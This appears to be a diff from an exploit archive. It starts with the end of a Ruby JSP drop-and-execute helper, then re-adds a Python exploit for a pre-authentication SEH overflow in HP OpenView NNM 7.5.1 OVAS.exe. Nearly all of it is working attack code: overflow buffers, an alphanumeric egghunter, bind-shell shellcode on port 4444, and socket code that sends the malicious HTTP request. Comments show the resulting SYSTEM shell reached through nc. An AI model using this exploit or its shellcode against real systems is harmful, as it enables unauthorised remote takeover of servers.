+    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
+    jspraw << %Q|} catch (IOException ioe) { }\n|
+    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
+    jspraw << %Q|%>\n|
+
+    jspraw
+  end
+
+  def jsp_drop_and_execute(bin_data, output_file)
+    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
+  end
+
+end

platforms/windows/remote/5342.py

@@ -1,151 +1,151 @@
-#!/usr/bin/python
-################################################################################
-# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
-# Tested on Windows 2003 Server SP1.
-# Coded by Mati Aharoni
-# muts..at..offensive-security.com
-# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
-# [shameless plug]
-# This vulnerability was found, analysed and exploited
-# as part of a training module in "BackTrack to the Max".
-# http://www.offensive-security.com/ilt.php
-# [/shameless plug]
-#################################################################################
-# bt 0day# python hp-nnm-ov.py
-# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
-# [*] http://www.offensive-security.com
-# [*] Sending evil HTTP request to NNMz, ph33r
-# [*] Egghunter working ...
-# [*] Check payload results - may take up to a minute.
-# bt 0day# nc -v 192.168.1.111 4444
-# (muts) [192.168.1.111] 4444 (krb524) open
-# Microsoft Windows [Version 5.2.3790]
-# (C) Copyright 1985-2003 Microsoft Corp.
-#
-# C:\>whoami
-# whoami
-# nt authority\system
-#
-# C:\>
-#
-################################################################################
-# Insane, "We own all those registers, but how the heck do we get EIP"  method.
-################################################################################
-# crash = "T"*1300
-#
-#################################################################################
-# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
-#################################################################################
-# Case  1 - Stack not happy:
-# crash = "T"*989
-#
-# Case 2 - Stack happy, we own EIP - blessed by the angels above:
-# 0x44442638 - Happy NNM address
-# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
-# 12 bytes of nasty strict alphanum shellcode possibility @EBP
-#
-################################################################################
-# Unknown "wtf, these bytes are expanding" SEH method:
-################################################################################
-# 0x6d356c6e - POP POP RET somewhere in NNM
-# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
-#
-################################################################################
-# Final exploit crash SEH method:
-################################################################################
-# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
-#
-################################################################################
-
-import socket
-import os
-import sys
-
-print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
-print "[*] http://www.offensive-security.com"
-
-# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
-# One egg to rule them all.
-
-egghunter=(
-"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
-"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
-"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
-"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
-"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
-"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
-"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
-"U%521*-1-wD-1-wD-8$GwP")
-
-alignstack="\x90"*34+"\x83\xc4\x03"
-
-# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
-# Spawned shell dies quickly as a result of a parent thread killing it.
-# Best shellcodes are of the "instant" type, such as adduser, etc.
-
-bindshell=("T00WT00W" + alignstack +
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
-"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
-"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
-"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
-"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
-"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
-"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
-"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
-"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
-"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
-"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
-"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
-"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
-"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
-"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
-"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
-"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
-"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
-"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
-"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
-"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
-"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
-"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
-"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
-"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
-"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
-"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
-"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
-"\x4f\x4f\x42\x4d\x5a")
-
-# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1
-
-evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510"
-
-buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n"
-buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
-buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
-buffer+="Content-Length: 1048580\r\n\r\n"
-buffer+= bindshell 
-
-print "[*] Sending evil HTTP request to NNMz, ph33r"
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect(("192.168.1.111", 7510))
-expl.send(buffer)
-expl.close()
-print "[*] Egghunter working ..."
-print "[*] Check payload results - may take up to a minute."
-
-# milw0rm.com [2008-04-02]
+#!/usr/bin/python
+################################################################################
+# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
+# Tested on Windows 2003 Server SP1.
+# Coded by Mati Aharoni
+# muts..at..offensive-security.com
+# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
+# [shameless plug]
+# This vulnerability was found, analysed and exploited
+# as part of a training module in "BackTrack to the Max".
+# http://www.offensive-security.com/ilt.php
+# [/shameless plug]
+#################################################################################
+# bt 0day# python hp-nnm-ov.py
+# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
+# [*] http://www.offensive-security.com
+# [*] Sending evil HTTP request to NNMz, ph33r
+# [*] Egghunter working ...
+# [*] Check payload results - may take up to a minute.
+# bt 0day# nc -v 192.168.1.111 4444
+# (muts) [192.168.1.111] 4444 (krb524) open
+# Microsoft Windows [Version 5.2.3790]
+# (C) Copyright 1985-2003 Microsoft Corp.
+#
+# C:\>whoami
+# whoami
+# nt authority\system
+#
+# C:\>
+#
+################################################################################
+# Insane, "We own all those registers, but how the heck do we get EIP"  method.
+################################################################################
+# crash = "T"*1300
+#
+#################################################################################
+# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
+#################################################################################
+# Case  1 - Stack not happy:
+# crash = "T"*989
+#
+# Case 2 - Stack happy, we own EIP - blessed by the angels above:
+# 0x44442638 - Happy NNM address
+# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
+# 12 bytes of nasty strict alphanum shellcode possibility @EBP
+#
+################################################################################
+# Unknown "wtf, these bytes are expanding" SEH method:
+################################################################################
+# 0x6d356c6e - POP POP RET somewhere in NNM
+# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
+#
+################################################################################
+# Final exploit crash SEH method:
+################################################################################
+# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
+#
+################################################################################
+
+import socket
+import os
+import sys
+
+print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
+print "[*] http://www.offensive-security.com"
+
+# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
+# One egg to rule them all.
+
+egghunter=(
+"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
+"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
+"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
+"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
+"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
+"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
+"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
+"U%521*-1-wD-1-wD-8$GwP")
+
+alignstack="\x90"*34+"\x83\xc4\x03"
+
+# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
+# Spawned shell dies quickly as a result of a parent thread killing it.
+# Best shellcodes are of the "instant" type, such as adduser, etc.
+
+bindshell=("T00WT00W" + alignstack +
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
+"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
+"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
+"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
+"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
+"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
+"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
+"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
+"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
+"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
+"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
+"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
+"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
+"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
+"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
+"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
+"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
+"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
+"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
+"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
+"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
+"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
+"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
+"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
+"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
+"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
+"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
+"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
+"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
+"\x4f\x4f\x42\x4d\x5a")
+
+# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1
+
+evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510"
+
+buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
+buffer+="Content-Length: 1048580\r\n\r\n"
+buffer+= bindshell 
+
+print "[*] Sending evil HTTP request to NNMz, ph33r"
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect(("192.168.1.111", 7510))
+expl.send(buffer)
+expl.close()
+print "[*] Egghunter working ..."
+print "[*] Check payload results - may take up to a minute."
+
+# milw0rm.com [2008-04-02]